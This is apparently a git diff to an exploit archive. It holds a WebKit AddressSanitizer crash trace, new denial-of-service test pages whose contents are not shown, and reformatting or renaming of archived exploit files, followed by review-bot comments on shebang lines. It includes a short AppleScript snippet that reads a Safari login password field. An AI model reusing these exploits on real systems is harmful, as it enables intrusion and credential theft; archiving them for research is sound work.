0x1111eaf61 in WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfdcf61) + #12 0x112bce3fb in WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c03fb) + #13 0x11296d30a in WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x275f30a) + #14 0x11274fd8f in 
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541d8f) + #15 0x1127510f0 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25430f0) + #16 0x11274fa11 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541a11) + #17 0x1127504a7 in WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool, WebCore::RenderBlock::PaintBlockType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25424a7) + #18 0x11274ffae in WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541fae) + #19 0x11274fe87 in WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541e87) + #20 0x1127510f0 in WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25430f0) + #21 0x11274fa11 in WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2541a11) + #22 0x11290e9e6 in WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector const&, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, 
unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27009e6) + #23 0x11290a93b in WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector const&, WebCore::GraphicsContext&, WebCore::GraphicsContext&, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26fc93b) + #24 0x112905528 in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f7528) + #25 0x1129029a2 in WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f49a2) + #26 0x11290a5ef in WebCore::RenderLayer::paintList(WTF::Vector*, WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26fc5ef) + #27 0x1129055ba in WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext&, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x26f75ba) + #28 0x11293f3c6 in WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, WebCore::IntRect const&, unsigned int, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27313c6) + #29 0x11293fb5f in WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect 
const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2731b5f) + #30 0x110e69212 in WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc5b212) + #31 0x110e7d715 in WebCore::GraphicsLayerCA::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xc6f715) + #32 0x112690ca8 in WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2482ca8) + #33 0x1131ccb57 in WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fbeb57) + #34 0x11345a2c7 in -[WebSimpleLayer drawInContext:] (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x324c2c7) + #35 0x7fffdadc0891 in CABackingStoreUpdate_ (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x13891) + #36 0x7fffdaedf557 in invocation function for block in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x132557) + #37 0x7fffdaedf06f in CA::Layer::display_() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x13206f) + #38 0x113459fbc in -[WebSimpleLayer display] (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x324bfbc) + #39 0x7fffdaed3051 in CA::Layer::display_if_needed(CA::Transaction*) 
(/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x126051) + #40 0x7fffdaed317c in CA::Layer::layout_and_display_if_needed(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x12617c) + #41 0x7fffdaec8933 in CA::Context::commit_transaction(CA::Transaction*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x11b933) + #42 0x7fffdadbd7e0 in CA::Transaction::commit() (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x107e0) + #43 0x7fffdadbe1fb in CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) (/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore:x86_64+0x111fb) + #44 0x7fffd52aed36 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6d36) + #45 0x7fffd52aeca6 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa6ca6) + #46 0x7fffd528f135 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87135) + #47 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #48 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #49 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #50 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #51 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] 
(/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #52 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #53 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #54 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #55 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #56 0x10b5bf56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #57 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x61200007e474 is located 28 bytes to the right of 280-byte region [0x61200007e340,0x61200007e458) +allocated by thread T0 here: + #0 0x10b626d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x11ede4ad4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x11ede2d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x11ed69247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x11ed6863a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x110354648 in 
WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x113041e7d in WebCore::SVGFilterElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e33e7d) + #8 0x112ff58a3 in WebCore::filterConstructor(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de78a3) + #9 0x112ff294d in WebCore::SVGElementFactory::createElement(WebCore::QualifiedName const&, WebCore::Document&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de494d) + #10 0x11099ad80 in WebCore::Document::createElement(WebCore::QualifiedName const&, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78cd80) + #11 0x110f1ed2d in WebCore::HTMLConstructionSite::createElement(WebCore::AtomicHTMLToken&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10d2d) + #12 0x110f1eabe in WebCore::HTMLConstructionSite::insertForeignElement(WebCore::AtomicHTMLToken&&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd10abe) + #13 0x11108190a in WebCore::HTMLTreeBuilder::processTokenInForeignContent(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe7390a) + #14 0x111080d07 in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d07) + #15 0x110f49c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #16 0x110f49849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #17 0x110f489c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #18 0x110f4a4e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #19 0x110928531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #20 0x110a6563d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #21 0x110a26736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #22 0x1104a2047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #23 0x11049adf1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #24 0x112f72661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #25 0x10db2d43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #26 0x10db306d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #27 0x10db2fbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #28 0x10d321117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #29 0x10d100695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + +SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e99152) in WebCore::SVGPatternElement::collectPatternAttributes(WebCore::PatternAttributes&) const +Shadow bytes around the buggy address: + 0x1c240000fc30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fc40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fc50: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa + 0x1c240000fc60: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x1c240000fc80: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa + 0x1c240000fc90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fcb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1c240000fcc0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c240000fcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==30453==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43173.html b/platforms/multiple/dos/43173.html new file mode 100644 index 000000000..0d1b8ffee --- /dev/null +++ b/platforms/multiple/dos/43173.html @@ -0,0 +1,162 @@ + + + +
+ + + + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43174.html b/platforms/multiple/dos/43174.html new file mode 100644 index 000000000..bee51fea5 --- /dev/null +++ b/platforms/multiple/dos/43174.html @@ -0,0 +1,168 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43175.html b/platforms/multiple/dos/43175.html new file mode 100644 index 000000000..88d1ce7fd --- /dev/null +++ b/platforms/multiple/dos/43175.html @@ -0,0 +1,214 @@ + + + + + +
+
+ + + + \ No newline at end of file diff --git a/platforms/multiple/dos/43176.html b/platforms/multiple/dos/43176.html new file mode 100644 index 000000000..6a14e8e83 --- /dev/null +++ b/platforms/multiple/dos/43176.html @@ -0,0 +1,194 @@ + + + + +
+ + + + + \ No newline at end of file diff --git a/platforms/multiple/local/19498.sh b/platforms/multiple/local/19498.sh index 64d8e3283..bdd0d73ea 100755 --- a/platforms/multiple/local/19498.sh +++ b/platforms/multiple/local/19498.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/636/info - -This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in its entirety in the 'Credit' section of this vulnerability entry. - -The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). +#!/bin/sh +# source: http://www.securityfocus.com/bid/636/info +# +# This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in its entirety in the 'Credit' section of this vulnerability entry. +# +# The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). #!/bin/sh # 
diff --git a/platforms/multiple/remote/34136.txt b/platforms/multiple/webapps/34136.txt similarity index 100% rename from platforms/multiple/remote/34136.txt rename to platforms/multiple/webapps/34136.txt diff --git a/platforms/osx/local/29950.js b/platforms/osx/local/29950.js index ad329af49..82554a37b 100644 --- a/platforms/osx/local/29950.js +++ b/platforms/osx/local/29950.js @@ -2,8 +2,6 @@ source: http://www.securityfocus.com/bid/23825/info Apple Safari is prone to an unspecified local vulnerability. -Few technical details are currently available. We will update this BID as more information emerges. - tell application "Safari" do JavaScript "alert(document.loginform.password.value)" in document 1 end tell \ No newline at end of file diff --git a/platforms/osx/remote/758.c b/platforms/osx/local/758.c similarity index 100% rename from platforms/osx/remote/758.c rename to platforms/osx/local/758.c diff --git a/platforms/osx/remote/1265.pl b/platforms/osx/remote/1265.pl index 295b94a6f..78560711a 100755 --- a/platforms/osx/remote/1265.pl +++ b/platforms/osx/remote/1265.pl @@ -1,3 +1,4 @@ + #!/usr/bin/perl # VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit # johnh[at]digitalmunition[dot]com diff --git a/platforms/php/webapps/2348.pl b/platforms/php/webapps/2348.pl index 114f0eb8e..001570d9e 100755 --- a/platforms/php/webapps/2348.pl +++ b/platforms/php/webapps/2348.pl @@ -37,7 +37,7 @@ my $res = $ua->request($req); $res=$ua->get('http://'.$ARGV[0].'/login.php'); $content=$res->content; -$content=~ m/true&sid=([^"]+)"/g; +$content=~ m/true&sid=([^"]+)"/g; if($ARGV[4]){ $content=$res->content; print $content; diff --git a/platforms/php/webapps/30036.html b/platforms/php/webapps/30036.html index f40179086..de8c10641 100644 --- a/platforms/php/webapps/30036.html +++ b/platforms/php/webapps/30036.html @@ -1,7 +1,6 @@ -source: http://www.securityfocus.com/bid/23965/info +
\ No newline at end of file diff --git a/platforms/sco/local/23141.sh b/platforms/sco/local/23141.sh index 52bbf9a9f..d18958f78 100755 --- a/platforms/sco/local/23141.sh +++ b/platforms/sco/local/23141.sh @@ -1,6 +1,8 @@ -source: http://www.securityfocus.com/bid/8616/info - -It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials. +#!/bin/sh +#source: http://www.securityfocus.com/bid/8616/info +# +#It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials. +# #!/bin/sh # diff --git a/platforms/solaris/local/15245.txt b/platforms/solaris/dos/15245.txt similarity index 100% rename from platforms/solaris/local/15245.txt rename to platforms/solaris/dos/15245.txt diff --git a/platforms/solaris/local/19161.txt b/platforms/solaris/dos/19161.txt similarity index 100% rename from platforms/solaris/local/19161.txt rename to platforms/solaris/dos/19161.txt diff --git a/platforms/windows/local/403.c b/platforms/windows/dos/403.c similarity index 100% rename from platforms/windows/local/403.c rename to platforms/windows/dos/403.c diff --git a/platforms/windows/remote/9815.py b/platforms/windows/dos/9815.py similarity index 100% rename from platforms/windows/remote/9815.py rename to platforms/windows/dos/9815.py 
diff --git a/platforms/windows/remote/9817.py b/platforms/windows/dos/9817.py similarity index 100% rename from platforms/windows/remote/9817.py rename to platforms/windows/dos/9817.py diff --git a/platforms/windows/dos/11987.txt b/platforms/windows/local/11987.txt similarity index 100% rename from platforms/windows/dos/11987.txt rename to platforms/windows/local/11987.txt diff --git a/platforms/windows/local/12012.txt b/platforms/windows/local/12012.txt index 859b4f78a..c873af431 100644 --- a/platforms/windows/local/12012.txt +++ b/platforms/windows/local/12012.txt @@ -1,8 +1,7 @@ # Exploit Title: Free MP3 CD Ripper 2.6 0 day # Date: 30/03/2010 # Author: Richard leahy -# Reference: -# http://www.exploit-db.com/exploits/11975 +# Reference: http://www.exploit-db.com/exploits/11975/ # Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html # Version: 2.6 # Tested on: Windows Xp Sp2 diff --git a/platforms/windows/local/19220.c b/platforms/windows/local/19220.c index 468c9dba0..8dfb1f1f4 100644 --- a/platforms/windows/local/19220.c +++ b/platforms/windows/local/19220.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/275/info A vulnerability in ColdFusion allows pages encrypted with the CFCRYPT.EXE utility to be decrypted. ColdFusion supports the ability to "encrypt" the CFML templates in an application or component, using the CFCRYPT.EXE utility, so they can be redistributed or sold without exposing the source code to casual viewing. A program that decrypts ColdFusion's encryption has been discovered. This will in effect make the source code for all this propietary CFML applications available to those with access to their encrypted form. +*/ /* CFDECRYPT: Decrypt Cold Fusion templates encrypted with CFCRYPT Matt Chapman diff --git a/platforms/windows/remote/2821.c b/platforms/windows/local/2821.c similarity index 100% rename from platforms/windows/remote/2821.c rename to platforms/windows/local/2821.c 
diff --git a/platforms/windows/remote/11420.py b/platforms/windows/remote/11420.py index 6fc257e38..d8fd1f366 100755 --- a/platforms/windows/remote/11420.py +++ b/platforms/windows/remote/11420.py @@ -3,8 +3,7 @@ # #Written by: Lincoln #Originally discovered by: loneferret -#Reference: -#http://www.exploit-db.com/exploits/11391 +#Reference: http://www.exploit-db.com/exploits/11391/ #Tested on: XPSP2 #root@box:~# ./ftpd.py 192.168.139.130 # diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt index 69e083a1d..614674636 100644 --- a/platforms/windows/remote/17977.txt +++ b/platforms/windows/remote/17977.txt @@ -12,8 +12,7 @@ FILES: SSL SUPPORT FOR THE REMOTE EXPLOITS * synscan-modded.tar - THE SYNSCAN IS MODDED FOR SCANNING JBOSS (X-Powered-By TAG) ON -PORT 8080 ONLY. + THE SYNSCAN IS MODDED FOR SCANNING JBOSS (X-Powered-By TAG) ON PORT 8080 ONLY. * pnscan-1.11.tar.gz ORIGINAL PARALLEL NETWORK SCANNER (NO CREDITS HERE) diff --git a/platforms/windows/remote/20459.html b/platforms/windows/remote/20459.html index 234a0b8cb..a682e24f7 100644 --- a/platforms/windows/remote/20459.html +++ b/platforms/windows/remote/20459.html @@ -1,3 +1,4 @@ + diff --git a/platforms/windows/remote/28225.c b/platforms/windows/remote/28225.c index 05eee436b..5109e858b 100644 --- a/platforms/windows/remote/28225.c +++ b/platforms/windows/remote/28225.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/18993/info Microsoft PowerPoint is prone to multiple remote vulnerabilities. 
@@ -5,10 +6,9 @@ Microsoft PowerPoint is prone to multiple remote vulnerabilities. Three proof-of-concept exploit files designed to trigger vulnerabilities in PowerPoint have been released. It is currently unknown if these three exploit files pertain to newly discovered, unpublished vulnerabilities or if they exploit previously disclosed issues. These issues may allow remote attackers to cause crashes or to execute arbitrary machine code in the context of the affected application, but this has not been confirmed. - -This BID will be updated and potentially split into individual records as further analysis is completed. - + Microsoft PowerPoint 2003 is vulnerable to these issues; other versions may also be affected. +*/ /*----------------------------------------------------------------------------------------- * MS Power Point Unspecified vulnerability POC
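Review bot: In the platforms/multiple/local/19498.sh hunk the file ends up with two shebang lines. The new `+#!/bin/sh` is added at line 1 and the header text is turned into `#` comments, but the original `#!/bin/sh` and `#` lines that follow the hunk are kept as context, so the old shebang now sits mid-file as a dead comment. Either drop the original `#!/bin/sh` / `#` pair in the same change, or leave the original shebang in place and insert the commented header after it, so the script has exactly one shebang at byte 0.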
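Review bot: The platforms/osx/local/29950.js hunk only removes the "Few technical details are currently available" BID boilerplate, but the remaining body (`tell application "Safari" ... end tell`) is AppleScript, not JavaScript, and the file still carries no trailing newline (`\ No newline at end of file`). Since this commit already renames files to correct their category, consider giving this one an extension that matches its content (or a `.txt` like the other BID write-ups) and adding the final newline while it is being touched.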
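Review bot: The platforms/osx/remote/1265.pl hunk (`@@ -1,3 +1,4 @@ +`) inserts an empty line before `#!/usr/bin/perl`. The kernel only honours a `#!` interpreter line when it is the first two bytes of the file, and this file is mode 100755, so after this change running it directly (`./1265.pl`) will hand it to the shell instead of Perl. Drop the added blank line, or place it after the shebang.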
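Review bot: In the platforms/php/webapps/2348.pl hunk the removed and added lines are byte-for-byte identical as rendered (`$content=~ m/true&sid=([^"]+)"/g;`), which means the change is trailing whitespace, a line ending, or a non-printing character. A change that is invisible in the diff should be named in the commit description; reviewers can confirm what moved with `git diff --ws-error-highlight=all` or `git diff -w` on this file.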
